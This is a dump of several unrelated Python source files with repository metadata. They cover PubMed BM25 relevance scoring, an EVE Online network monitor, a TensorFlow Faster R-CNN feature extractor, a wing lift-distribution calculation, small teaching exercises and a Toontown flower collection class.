idf_egfr = log((29138919 - 48503 + 0.5) / (48503 + 0.5), 10)
idf_ele_1 = log((13670358 - 0 + 0.5) / (0 + 0.5), 10)
idf_ele_2 = log((13670358 - 0 + 0.5) / (0 + 0.5), 10)
idf_ele_3 = log((13670358 - 37086 + 0.5) / (37086 + 0.5), 10)
idf_ele_4 = log((13670358 - 7893 + 0.5) / (7893 + 0.5), 10)
idf_ele_5 = log((13670358 - 0 + 0.5) / (0 + 0.5), 10)
idf_eleM_1 = log((25389659 - 46906 + 0.5) / (46906 + 0.5), 10)
idf_eleM_2 = log((25389659 - 9290 + 0.5) / (9290+ 0.5), 10)
idf_eleM_3 = log((25389659 - 0 + 0.5) / (0 + 0.5), 10)
idf_eleM_4 = log((25389659 - 0 + 0.5) / (0 + 0.5), 10)
idf_eleM_5 = log((25389659 - 17437618 + 0.5) / (17437618 + 0.5), 10)
idf_eleM_6 = log((25389659 - 8002162 + 0.5) / (8002162 + 0.5), 10)
idf_eleM_7 = log((25389659 - 2842020 + 0.5) / (2842020 + 0.5), 10)
idf_eleM_8 = log((25389659 - 0 + 0.5) / (0 + 0.5), 10)
idf_eleM_9 = log((25389659 - 4785026 + 0.5) / (4785026 + 0.5), 10)
idf_eleK_1 = log((5435471 - 13963 + 0.5) / (13963 + 0.5), 10)
idf_eleK_2 = log((5435471 - 6390 + 0.5) / (6390 + 0.5), 10)
idf_eleK_3 = log((5435471 - 0 + 0.5) / (0 + 0.5), 10)
for x in myfreq.find({}, {'PMID', 'wordfreq', 'ChemicalNameList', 'MeshHeadingNameList', 'KeywordsList'},
no_cursor_timeout=True):
ss1 = 0
ss2 = 0
ss4 = 0
gx = 0
gx1 = 0
gx2 = 0
gx3 = 0
gx4=0
len_freq=0
esophageal_score=0
egfr_score = 0
if int(x['PMID']) <= 27868941:
cop = re.compile("[^\u4e00-\u9fa5^a-z^A-Z^0-9]") # 匹配不是中文、大小写、数字的其他字符
ChemicalNameList = x['ChemicalNameList']
MeshHeadingNameList = x['MeshHeadingNameList']
KeywordsList = x['KeywordsList']
wordfreq = x['wordfreq']
esophageal = [True for x in wordfreq.items() if 'esophageal' in x]
# ---------------摘要统计-------------------#
for key in wordfreq:
len_freq = len_freq + wordfreq[key]
for key in wordfreq:
key1 = cop.sub('', key)
if 'esophageal' in key1:
esophageal_score = esophageal_score + wordfreq[key]
for key in wordfreq:
key1 = cop.sub('', key)
if 'egfr' == key1:
egfr_score = egfr_score + wordfreq[key]
bm25_esophageal_score = (((k1+1)*esophageal_score)/((k1*(b1+(1-b1)*(len_freq/85)))+esophageal_score))
bm25_egfr_score = (((k1 + 1) * egfr_score) / ((k1 * (b1 + (1 - b1) * (len_freq / 85))) + egfr_score))
bm25_ab_score =idf_esophageal*bm25_esophageal_score+idf_egfr*bm25_egfr_score
idf_para=[{str(esophageal_score):idf_esophageal},{str(egfr_score):idf_egfr}]
# ---------------共现分析摘要-------------------#
if len(esophageal) != 0 and esophageal[0]:
for key in wordfreq:
key = cop.sub('', key)
if 'egfr' == key:
gx = idf_egfr
# ---------------共现分析化学-------------------#
if len(esophageal) != 0 and esophageal[0]:
for ele in ChemicalNameList:
if 'EGFR' in ele['NameOfSubstance']:
gx = idf_egfr
break
# ---------------共现分析关键字-------------------#
if len(esophageal) != 0 and esophageal[0]:
for eleK in KeywordsList:
if 'egfr' in str(eleK).lower():
gx = idf_egfr
break
# ---------------共现分析医学主题词-------------------#
if len(esophageal) != 0 and esophageal[0]:
for eleM in MeshHeadingNameList:
if 'EGFR' in eleM['MeshHeadingName']:
gx = idf_egfr
break
for ele in ChemicalNameList:
if 'Esophageal Neoplasms' == ele['NameOfSubstance']:
ss1 = ss1 + idf_ele_1
break
for ele in ChemicalNameList:
if 'Rare Diseases' == ele['NameOfSubstance']:
ss1 = ss1 + idf_ele_2
break
for ele in ChemicalNameList:
if 'ErbB Receptors' == ele['NameOfSubstance']:
ss1 = ss1 + idf_ele_3
break
for ele in ChemicalNameList:
if 'EGFR' == ele['NameOfSubstance']:
ss1 = ss1 + idf_ele_4
break
for eleM in MeshHeadingNameList:
if 'Esophageal Neoplasms' == eleM['MeshHeadingName']:
ss2 = ss2 + idf_eleM_1
break
for eleM in MeshHeadingNameList:
if 'Rare Diseases' == eleM['MeshHeadingName']:
ss2 = ss2 + idf_eleM_2
break
for eleM in MeshHeadingNameList:
if 'EGFR' == eleM['MeshHeadingName']:
ss2 = ss2 + idf_eleM_3
break
for eleM in MeshHeadingNameList:
if 'ErbB Receptors' == eleM['MeshHeadingName']:
ss2 = ss2 + idf_eleM_4
break
for eleM in MeshHeadingNameList:
if re.findall(r'(Human|Humans)', eleM['MeshHeadingName']):
ss2 = ss2 + idf_eleM_5
break
for eleM in MeshHeadingNameList:
if 'Male' in eleM['MeshHeadingName']:
ss2 = ss2 + idf_eleM_6
break
for eleM in MeshHeadingNameList:
if 'Aged' == eleM['MeshHeadingName']:
ss2 = ss2 + idf_eleM_7
break
for eleM in MeshHeadingNameList:
if re.findall(r'(Adult|Adults)', eleM['MeshHeadingName']):
ss2 = ss2 + idf_eleM_9
break
for eleK in KeywordsList:
if 'esophageal' in str(eleK).lower():
ss4 = ss4 + idf_eleK_1
break
for eleK in KeywordsList:
if 'egfr' in str(eleK).lower():
ss4 = ss4 + idf_eleK_2
break
total_gx=gx1+gx2+gx3+gx+gx4
cmk_len=len(ChemicalNameList) + len(MeshHeadingNameList) + len(KeywordsList)
bm25_cmk_len=ss1 + ss2 + ss4
bm25_cmk_score = (((k2 + 1) * bm25_cmk_len) / ((k2 * (b2 + (1 - b2) * (cmk_len / 13))) + bm25_cmk_len))
bm25_score=bm25_ab_score+bm25_cmk_score+total_gx
if(bm25_score>yuzhi):
mydict = {"PMID": x['PMID'],"ab_score":bm25_ab_score,"idf_para":idf_para,
"cmk_len":cmk_len,"cmk_freq":bm25_cmk_len,"bm25_cmk_score":bm25_cmk_score,"gx":total_gx,"bm25_score":bm25_score,
"ChemicalNameList":x['ChemicalNameList'],"MeshHeadingNameList":x['MeshHeadingNameList'],"KeywordsList":x['KeywordsList']}
y = mydata.insert_one(mydict)
k=k+1
print(str(y) + '---------' + str(k))
def count(mysort,mycount,topic):
for x in mysort.find({}, {'PMID', 'ab_score','idf_para', 'cmk_len', 'cmk_freq', 'bm25_cmk_score','gx','bm25_score',
'ChemicalNameList', 'MeshHeadingNameList', 'KeywordsList'}):
kk = 0
for y in mytopic.find({"topic": topic}, {'PMID', 'relate'}):
if x['PMID'] == y['PMID']:
mydict = {"PMID": x['PMID'], "related": y['relate'], "ab_score":x["ab_score"],"idf_para":x['idf_para'],
"cmk_len": x['cmk_len'], "cmk_freq": x['cmk_freq'],'bm25_cmk_score':x['bm25_cmk_score'],'gx':x['gx'],
"bm25_score": x['bm25_score'],
"ChemicalNameList": x['ChemicalNameList'], "MeshHeadingNameList": x['MeshHeadingNameList'],
"KeywordsList": x['KeywordsList']}
ss = mycount.insert_one(mydict)
print(ss)
kk = kk + 1
if (kk == 0):
mydict = {"PMID": x['PMID'], "related": -1, "ab_score": x["ab_score"], "idf_para": x['idf_para'],
"cmk_len": x['cmk_len'], "cmk_freq": x['cmk_freq'], 'bm25_cmk_score': x['bm25_cmk_score'],
'gx': x['gx'],
"bm25_score": x['bm25_score'],
"ChemicalNameList": x['ChemicalNameList'], "MeshHeadingNameList": x['MeshHeadingNameList'],
"KeywordsList": x['KeywordsList']}
ss = mycount.insert_one(mydict)
print(ss)
if __name__ == '__main__':
sortsecond(mywords,mydata,7)
count(mydata,mycount,"29")
| [
"[email protected]"
] | |
2beb1f616a83a5c13a520bc827faceffac12cedc | 5864e86954a221d52d4fa83a607c71bacf201c5a | /eve/devtools/script/networkdatamonitor.py | ad91d9153d462512bd7775ae06745daf165a0b2d | [] | no_license | connoryang/1v1dec | e9a2303a01e5a26bf14159112b112be81a6560fd | 404f2cebf13b311e754d45206008918881496370 | refs/heads/master | 2021-05-04T02:34:59.627529 | 2016-10-19T08:56:26 | 2016-10-19T08:56:26 | 71,334,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,749 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\devtools\script\networkdatamonitor.py
import operator
import carbonui.const as uiconst
from carbonui.primitives.container import Container
from eve.client.script.ui.control.buttons import Button
from eve.client.script.ui.control.eveLabel import Label
from eve.client.script.ui.control.eveWindow import Window
import log
import uthread2
import util
PROPS = [('Packets out', 'packets_out', 0),
('Packets in', 'packets_in', 0),
('Kilobytes out', 'bytes_out', 1),
('Kilobytes in', 'bytes_in', 1)]
class NetworkDataMonitor(Window):
default_caption = 'Network Data Monitor'
default_windowID = 'networkdatamonitor'
default_minSize = (400, 300)
refreshDelay = 0.5
def ApplyAttributes(self, attributes):
self._ready = False
Window.ApplyAttributes(self, attributes)
self.Reset()
self.SetTopparentHeight(4)
self.settingsContainer = Container(parent=self.sr.main, align=uiconst.TOBOTTOM, height=16, padding=8)
Button(parent=self.settingsContainer, label='Reset', align=uiconst.CENTER, func=self.Reset)
container = Container(parent=self.sr.main, align=uiconst.TOALL, padding=8)
statusHeader = ' '
for tme in self.intvals:
statusHeader += '<t><right>%s' % util.FmtDate(long(tme * 10000), 'ss')
statusHeader += '<t><right>total'
self.statusLabels = []
txt = Label(parent=container, align=uiconst.TOPLEFT, text=statusHeader, tabs=[80,
130,
180,
230,
280,
330,
380], state=uiconst.UI_DISABLED)
for i in xrange(7):
statusLabel = Label(parent=container, text='', top=(i + 1) * txt.height + 1, align=uiconst.TOPLEFT, tabs=[80,
130,
180,
230,
280,
330,
380], state=uiconst.UI_DISABLED)
self.statusLabels.append(statusLabel)
self.PopulateLabels()
uthread2.StartTasklet(self.Refresh)
def Reset(self, *args):
self.intvals = [5000,
10000,
15000,
30000,
60000]
self.counter = [[],
[],
[],
[],
[],
[]]
self.ticker = 0
self.packets_outTotal = 0
self.packets_inTotal = 0
self.bytes_outTotal = 0
self.bytes_inTotal = 0
self.laststats = {}
self.lastresetstats = sm.GetService('machoNet').GetConnectionProperties()
def Refresh(self):
while not self.destroyed:
uthread2.Sleep(self.refreshDelay)
self.PopulateLabels()
def PopulateLabels(self, *args):
self.ticker += self.intvals[0]
if self.ticker > self.intvals[-1]:
self.ticker = self.intvals[0]
stats = sm.GetService('machoNet').GetConnectionProperties()
if self.laststats == {}:
self.laststats = stats
if self.lastresetstats != {}:
for key in stats.iterkeys():
stats[key] = stats[key] - self.lastresetstats[key]
for i in xrange(len(self.counter) - 1):
self.counter[i].append([ stats[key] - self.laststats[key] for header, key, K in PROPS ])
self.counter[i] = self.counter[i][-(self.intvals[i] / 1000):]
self.counter[-1].append([ stats[key] - self.laststats[key] for header, key, K in PROPS ])
if not self.display:
self.laststats = stats
return
valueIdx = 0
for header, key, K in PROPS:
statusstr = '%s' % header
for intvals in self.counter:
value = reduce(operator.add, [ intval[valueIdx] for intval in intvals ], 0)
if not value:
statusstr += '<t><right>-'
else:
statusstr += '<t><right>%s' % [value, '%.1f' % (value / 1024.0)][K]
self.statusLabels[valueIdx].text = statusstr
valueIdx += 1
self.statusLabels[valueIdx].text = 'Outstanding<t><right>%s' % stats['calls_outstanding']
valueIdx += 1
self.statusLabels[valueIdx].text = 'Blocking Calls<t><right>%s' % stats['blocking_calls']
valueIdx += 1
block_time = stats['blocking_call_times']
if block_time >= 0:
secs = util.SecsFromBlueTimeDelta(block_time)
self.statusLabels[valueIdx].text = 'Blocking time<t><right>%sH<t><right>%sM<t><right>%sS' % util.HoursMinsSecsFromSecs(secs)
elif not hasattr(self, 'warnedBlockingTimeNegative'):
self.warnedBlockingTimeNegative = True
log.LogTraceback('Blocking time is negative?')
self.laststats = stats
| [
"[email protected]"
] | |
11297a63b6c776b7bc4dd49d2b1fa0ad4699fc53 | f8d3f814067415485bb439d7fe92dc2bbe22a048 | /models/research/object_detection/models/faster_rcnn_inception_v2_feature_extractor.py | 60e98f2b2ba3619347c6f61da69b7f71c6f59039 | [
"Apache-2.0"
] | permissive | gmonkman/python | 2f9ab8f159c01f6235c86cb0cd52062cd3fdedd3 | 9123aa6baf538b662143b9098d963d55165e8409 | refs/heads/master | 2023-04-09T15:53:29.746676 | 2022-11-26T20:35:21 | 2022-11-26T20:35:21 | 60,254,898 | 0 | 2 | null | 2023-03-24T22:58:39 | 2016-06-02T10:25:27 | Python | UTF-8 | Python | false | false | 12,152 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Inception V2 Faster R-CNN implementation.
See "Rethinking the Inception Architecture for Computer Vision"
https://arxiv.org/abs/1512.00567
"""
import tensorflow as tf
from object_detection.meta_architectures import faster_rcnn_meta_arch
from slim.nets import inception_v2
slim = tf.contrib.slim
def _batch_norm_arg_scope(list_ops,
use_batch_norm=True,
batch_norm_decay=0.9997,
batch_norm_epsilon=0.001,
batch_norm_scale=False,
train_batch_norm=False):
"""Slim arg scope for InceptionV2 batch norm."""
if use_batch_norm:
batch_norm_params = {
'is_training': train_batch_norm,
'scale': batch_norm_scale,
'decay': batch_norm_decay,
'epsilon': batch_norm_epsilon
}
normalizer_fn = slim.batch_norm
else:
normalizer_fn = None
batch_norm_params = None
return slim.arg_scope(list_ops,
normalizer_fn=normalizer_fn,
normalizer_params=batch_norm_params)
class FasterRCNNInceptionV2FeatureExtractor(
faster_rcnn_meta_arch.FasterRCNNFeatureExtractor):
"""Faster R-CNN Inception V2 feature extractor implementation."""
def __init__(self,
is_training,
first_stage_features_stride,
batch_norm_trainable=False,
reuse_weights=None,
weight_decay=0.0,
depth_multiplier=1.0,
min_depth=16):
"""Constructor.
Args:
is_training: See base class.
first_stage_features_stride: See base class.
batch_norm_trainable: See base class.
reuse_weights: See base class.
weight_decay: See base class.
depth_multiplier: float depth multiplier for feature extractor.
min_depth: minimum feature extractor depth.
Raises:
ValueError: If `first_stage_features_stride` is not 8 or 16.
"""
if first_stage_features_stride != 8 and first_stage_features_stride != 16:
raise ValueError('`first_stage_features_stride` must be 8 or 16.')
self._depth_multiplier = depth_multiplier
self._min_depth = min_depth
super(FasterRCNNInceptionV2FeatureExtractor, self).__init__(
is_training, first_stage_features_stride, batch_norm_trainable,
reuse_weights, weight_decay)
def preprocess(self, resized_inputs):
"""Faster R-CNN Inception V2 preprocessing.
Maps pixel values to the range [-1, 1].
Args:
resized_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
Returns:
preprocessed_inputs: a [batch, height, width, channels] float tensor
representing a batch of images.
"""
return (2.0 / 255.0) * resized_inputs - 1.0
def _extract_proposal_features(self, preprocessed_inputs, scope):
"""Extracts first stage RPN features.
Args:
preprocessed_inputs: A [batch, height, width, channels] float32 tensor
representing a batch of images.
scope: A scope name.
Returns:
rpn_feature_map: A tensor with shape [batch, height, width, depth]
activations: A dictionary mapping feature extractor tensor names to
tensors
Raises:
InvalidArgumentError: If the spatial size of `preprocessed_inputs`
(height or width) is less than 33.
ValueError: If the created network is missing the required activation.
"""
preprocessed_inputs.get_shape().assert_has_rank(4)
shape_assert = tf.Assert(
tf.logical_and(tf.greater_equal(tf.shape(preprocessed_inputs)[1], 33),
tf.greater_equal(tf.shape(preprocessed_inputs)[2], 33)),
['image size must at least be 33 in both height and width.'])
with tf.control_dependencies([shape_assert]):
with tf.variable_scope('InceptionV2',
reuse=self._reuse_weights) as scope:
with _batch_norm_arg_scope([slim.conv2d, slim.separable_conv2d],
batch_norm_scale=True,
train_batch_norm=self._train_batch_norm):
_, activations = inception_v2.inception_v2_base(
preprocessed_inputs,
final_endpoint='Mixed_4e',
min_depth=self._min_depth,
depth_multiplier=self._depth_multiplier,
scope=scope)
return activations['Mixed_4e'], activations
def _extract_box_classifier_features(self, proposal_feature_maps, scope):
"""Extracts second stage box classifier features.
Args:
proposal_feature_maps: A 4-D float tensor with shape
[batch_size * self.max_num_proposals, crop_height, crop_width, depth]
representing the feature map cropped to each proposal.
scope: A scope name (unused).
Returns:
proposal_classifier_features: A 4-D float tensor with shape
[batch_size * self.max_num_proposals, height, width, depth]
representing box classifier features for each proposal.
"""
net = proposal_feature_maps
depth = lambda d: max(int(d * self._depth_multiplier), self._min_depth)
trunc_normal = lambda stddev: tf.truncated_normal_initializer(0.0, stddev)
data_format = 'NHWC'
concat_dim = 3 if data_format == 'NHWC' else 1
with tf.variable_scope('InceptionV2', reuse=self._reuse_weights):
with slim.arg_scope(
[slim.conv2d, slim.max_pool2d, slim.avg_pool2d],
stride=1,
padding='SAME',
data_format=data_format):
with _batch_norm_arg_scope([slim.conv2d, slim.separable_conv2d],
batch_norm_scale=True,
train_batch_norm=self._train_batch_norm):
with tf.variable_scope('Mixed_5a'):
with tf.variable_scope('Branch_0'):
branch_0 = slim.conv2d(
net, depth(128), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_0 = slim.conv2d(branch_0, depth(192), [3, 3], stride=2,
scope='Conv2d_1a_3x3')
with tf.variable_scope('Branch_1'):
branch_1 = slim.conv2d(
net, depth(192), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_1 = slim.conv2d(branch_1, depth(256), [3, 3],
scope='Conv2d_0b_3x3')
branch_1 = slim.conv2d(branch_1, depth(256), [3, 3], stride=2,
scope='Conv2d_1a_3x3')
with tf.variable_scope('Branch_2'):
branch_2 = slim.max_pool2d(net, [3, 3], stride=2,
scope='MaxPool_1a_3x3')
net = tf.concat([branch_0, branch_1, branch_2], concat_dim)
with tf.variable_scope('Mixed_5b'):
with tf.variable_scope('Branch_0'):
branch_0 = slim.conv2d(net, depth(352), [1, 1],
scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = slim.conv2d(
net, depth(192), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_1 = slim.conv2d(branch_1, depth(320), [3, 3],
scope='Conv2d_0b_3x3')
with tf.variable_scope('Branch_2'):
branch_2 = slim.conv2d(
net, depth(160), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_2 = slim.conv2d(branch_2, depth(224), [3, 3],
scope='Conv2d_0b_3x3')
branch_2 = slim.conv2d(branch_2, depth(224), [3, 3],
scope='Conv2d_0c_3x3')
with tf.variable_scope('Branch_3'):
branch_3 = slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = slim.conv2d(
branch_3, depth(128), [1, 1],
weights_initializer=trunc_normal(0.1),
scope='Conv2d_0b_1x1')
net = tf.concat([branch_0, branch_1, branch_2, branch_3],
concat_dim)
with tf.variable_scope('Mixed_5c'):
with tf.variable_scope('Branch_0'):
branch_0 = slim.conv2d(net, depth(352), [1, 1],
scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = slim.conv2d(
net, depth(192), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_1 = slim.conv2d(branch_1, depth(320), [3, 3],
scope='Conv2d_0b_3x3')
with tf.variable_scope('Branch_2'):
branch_2 = slim.conv2d(
net, depth(192), [1, 1],
weights_initializer=trunc_normal(0.09),
scope='Conv2d_0a_1x1')
branch_2 = slim.conv2d(branch_2, depth(224), [3, 3],
scope='Conv2d_0b_3x3')
branch_2 = slim.conv2d(branch_2, depth(224), [3, 3],
scope='Conv2d_0c_3x3')
with tf.variable_scope('Branch_3'):
branch_3 = slim.max_pool2d(net, [3, 3], scope='MaxPool_0a_3x3')
branch_3 = slim.conv2d(
branch_3, depth(128), [1, 1],
weights_initializer=trunc_normal(0.1),
scope='Conv2d_0b_1x1')
proposal_classifier_features = tf.concat(
[branch_0, branch_1, branch_2, branch_3], concat_dim)
return proposal_classifier_features
| [
"[email protected]"
] | |
3e3fa24bb242e68bd2148c3982eaedf610738f1e | 8fa938eddcc75eb7dff1f2055c49cb3817a00c63 | /Basic - Part1/ex124.py | a5b7b3c3bf10bb3195275eca92ec3fbbf51c9665 | [] | no_license | jayhebe/w3resource_exercises | f27109759d112b0611574aa70eb378ace447c2a0 | b29aa7c806f6021a8988e83bb9f674522a41380d | refs/heads/master | 2020-05-07T09:23:24.039271 | 2020-01-30T15:05:06 | 2020-01-30T15:05:06 | 180,374,062 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 78 | py | x = 1
y = 1
z = 1
if x == y == z:
print("All variables have same value!")
| [
"[email protected]"
] | |
3b5330ea0aa6a4a8d96e5804f4c85d8878f67ed5 | d5440edcfc66496937e98c557ab9c33946234808 | /lifting line theory basic.py | 750e9c9edd03ecebdd25e481ebf6dc7a98950762 | [] | no_license | geoffreynyaga/lifting-line-theory | 4df7fb1baca79b9e3dfb19f5ec6c4ba86fa8fe69 | 352e1379863adf25c5f3e4966e16ae67d38f97ba | refs/heads/master | 2022-08-30T04:18:23.725361 | 2020-02-14T18:55:28 | 2020-02-14T18:55:28 | 99,334,542 | 2 | 0 | null | 2022-06-22T01:09:44 | 2017-08-04T10:58:33 | Python | UTF-8 | Python | false | false | 2,355 | py | # coding: utf-8
__author__ = "Geoffrey Nyaga"
import numpy as np # type: ignore
import math
import matplotlib.pylab as plt # type: ignore
N: int = 9 # (number of segments - 1)
S: float = 24.39 # wing area m^2
AR: float = 7.8 # Aspect ratio
taper: float = 0.45 # Taper ratio
alpha_twist: float = -2.0 # Twist angle (deg)
i_w: float = 1.0 # wing setting angle (deg)
a_2d: float = 6.8754 # lift curve slope (1/rad)
alpha_0: float = -4.2 # zero-lift angle of attack (deg)
b = math.sqrt(AR * S) # wing span (m)
MAC = S / b # Mean Aerodynamic Chord (m)
Croot = (1.5 * (1 + taper) * MAC) / (1 + taper + taper ** 2) # root chord (m)
# theta = np.arange(math.pi/(2*N), math.pi/2, math.pi/(2*(N)))
theta = np.linspace((math.pi / (2 * N)), (math.pi / 2), N, endpoint=True)
# alpha =np.arange(i_w+alpha_twist,i_w ,-alpha_twist/(N))
alpha = np.linspace(i_w + alpha_twist, i_w, N)
z = (b / 2) * np.cos(theta)
c = Croot * (1 - (1 - taper) * np.cos(theta)) # Mean Aerodynamics
mu = c * a_2d / (4 * b)
LHS = mu * (np.array(alpha) - alpha_0) / 57.3 # .reshape((N-1),1)# Left Hand Side
RHS = []
for i in range(1, 2 * N + 1, 2):
RHS_iter = np.sin(i * theta) * (
1 + (mu * i) / (np.sin(list(theta)))
) # .reshape(1,N)
# print(RHS_iter,"RHS_iter shape")
RHS.append(RHS_iter)
test = np.asarray(RHS)
x = np.transpose(test)
inv_RHS = np.linalg.inv(x)
ans = np.matmul(inv_RHS, LHS)
mynum = np.divide((4 * b), c)
test = (np.sin((1) * theta)) * ans[0] * mynum
test1 = (np.sin((3) * theta)) * ans[1] * mynum
test2 = (np.sin((5) * theta)) * ans[2] * mynum
test3 = (np.sin((7) * theta)) * ans[3] * mynum
test4 = (np.sin((9) * theta)) * ans[4] * mynum
test5 = (np.sin((11) * theta)) * ans[5] * mynum
test6 = (np.sin((13) * theta)) * ans[6] * mynum
test7 = (np.sin((15) * theta)) * ans[7] * mynum
test8 = (np.sin((17) * theta)) * ans[8] * mynum
CL = test + test1 + test2 + test3 + test4 + test5 + test6 + test7 + test8
CL1 = np.append(0, CL)
y_s = [b / 2, z[0], z[1], z[2], z[3], z[4], z[5], z[6], z[7], z[8]]
plt.plot(y_s, CL1, marker="o")
plt.title("Lifting Line Theory\n Elliptical Lift distribution")
plt.xlabel("Semi-span location (m)")
plt.ylabel("Lift coefficient")
plt.grid()
plt.show()
CL_wing = (
math.pi * AR * ans[0]
) # USE THIS CL WITH CRUISE SPEED TO CALCULATE THE ACCURATE LIFT!!!!!!!!!!
print(CL_wing, "CL_wing")
| [
"[email protected]"
] | |
ff54639667d43e2a8ef0b80917c081381a5370b5 | 5471de6fd11cc36e8ad9c05ea25d13ae568ad060 | /ClassesAndInstances/Lab Vet.py | 0661e0116a2ab4a17184311b5b09a71a094a3404 | [] | no_license | olgayordanova/PythonOOP | 75bbf9a20c612be7212de7bed59edccef1e02304 | 2d177d17bf50335b17f6246198b1cf85719de1df | refs/heads/main | 2023-03-30T18:59:56.751037 | 2021-04-03T19:48:37 | 2021-04-03T19:48:37 | 333,202,583 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,327 | py | class Vet:
animals =[]
space =5
def __init__(self, name):
self.name =name
self.animals = []
def register_animal(self,animal_name):
if len(Vet.animals)<Vet.space:
self.animals.append(animal_name)
Vet.animals.append ( animal_name )
return f"{animal_name} registered in the clinic"
else:
return f"Not enough space"
def unregister_animal(self, animal_name):
if animal_name in self.animals:
self.animals.remove ( animal_name )
Vet.animals.remove ( animal_name )
return f"{animal_name} unregistered successfully"
else:
return f"{animal_name} not in the clinic"
def info(self):
return f"{self.name} has {len(self.animals)} animals. {Vet.space-len(Vet.animals)} space left in clinic"
peter = Vet("Peter")
george = Vet("George")
print(peter.register_animal("Tom"))
print(george.register_animal("Cory"))
print(peter.register_animal("Fishy"))
print(peter.register_animal("Bobby"))
print(george.register_animal("Kay"))
print(george.unregister_animal("Cory"))
print(peter.register_animal("Silky"))
print(peter.unregister_animal("Molly"))
print(peter.unregister_animal("Tom"))
print(peter.info())
print(george.info())
| [
"[email protected]"
] | |
b8728bf275bb2ca91a768945aac95810d2f474eb | 55647a80c8b412af9df0ba3f50595cc2f29c25e6 | /res/scripts/client/gui/shared/gui_items/dossier/achievements/Achieved.py | abf5a6ed09d5c5dab3a8ed8390af41b1ca9fb8d5 | [] | no_license | cnsuhao/WOT-0.9.17-CT | 0035eb6070fb4fab8d8ee9f8bbc676c10d511cfb | d1f932d8cabaf8aa21708622e87f83c8d24d6451 | refs/heads/master | 2021-06-08T18:11:07.039293 | 2016-11-19T19:12:37 | 2016-11-19T19:12:37 | null | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 668 | py | # 2016.11.19 19:52:48 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/gui/shared/gui_items/dossier/achievements/Achieved.py
from abstract import RegularAchievement
from gui.shared.gui_items.dossier.achievements import validators
class Achieved(RegularAchievement):
@classmethod
def checkIsValid(cls, block, name, dossier):
return validators.alreadyAchieved(cls, name, block, dossier)
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\gui\shared\gui_items\dossier\achievements\Achieved.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2016.11.19 19:52:48 Střední Evropa (běžný čas)
| [
"[email protected]"
] | |
8051de40984a9a2acb43e21095fbc3aae7026551 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_118/ch23_2020_03_11_11_23_45_741474.py | c6ecc8ea4e87cf6cff5cef2378d5c6e336252e92 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 203 | py | def velocidade(c):
v=(c-80)*5
return v
x = float(input('Qual a velocidade? '))
y=velocidade(x)
if y == 0:
print('Não foi multado')
else:
print ('Foi multado em R$ '' {0:.2f}'.format (y)) | [
"[email protected]"
] | |
b76eebcce6d333ab9eeb6a635d645bcff821d353 | cd4bbecc3f713b0c25508d0c5674d9e103db5df4 | /toontown/estate/FlowerCollection.py | ae519a6213959a49508db54bc4af3e2794d78be4 | [] | no_license | peppythegod/ToontownOnline | dce0351cfa1ad8c476e035aa3947fdf53de916a6 | 2e5a106f3027714d301f284721382cb956cd87a0 | refs/heads/master | 2020-04-20T05:05:22.934339 | 2020-01-02T18:05:28 | 2020-01-02T18:05:28 | 168,646,608 | 11 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,443 | py | import GardenGlobals
from direct.directnotify import DirectNotifyGlobal
import FlowerBase
class FlowerCollection:
notify = DirectNotifyGlobal.directNotify.newCategory('FlowerCollection')
def __init__(self):
self.flowerlist = []
def __len__(self):
return len(self.flowerlist)
def getFlower(self):
return self.flowerlist
def makeFromNetLists(self, speciesList, varietyList):
self.flowerlist = []
for (species, variety) in zip(speciesList, varietyList):
self.flowerlist.append(FlowerBase.FlowerBase(species, variety))
def getNetLists(self):
speciesList = []
varietyList = []
for flower in self.flowerlist:
speciesList.append(flower.getSpecies())
varietyList.append(flower.getVariety())
return [speciesList, varietyList]
def hasFlower(self, species, variety):
for flower in self.flowerlist:
if flower.getSpecies() == species and flower.getVariety(
) == variety:
return 1
continue
return 0
def hasSpecies(self, species):
for flower in self.flowerlist:
if flower.getSpecies() == species:
return 1
continue
return 0
def getInitialVariety(self, species):
retVal = 100000
for flower in self.flowerlist:
if flower.getSpecies() == species:
if flower.getVariety() < retVal:
retVal = flower.getVariety()
flower.getVariety() < retVal
if retVal == 100000:
retVal = 0
return retVal
def _FlowerCollection__collect(self, newFlower, updateCollection):
for flower in self.flowerlist:
if flower.getVariety() == newFlower.getVariety(
) and flower.getSpecies() == newFlower.getSpecies():
return GardenGlobals.COLLECT_NO_UPDATE
continue
if updateCollection:
self.flowerlist.append(newFlower)
return GardenGlobals.COLLECT_NEW_ENTRY
def collectFlower(self, newFlower):
return self._FlowerCollection__collect(newFlower, updateCollection=1)
def __str__(self):
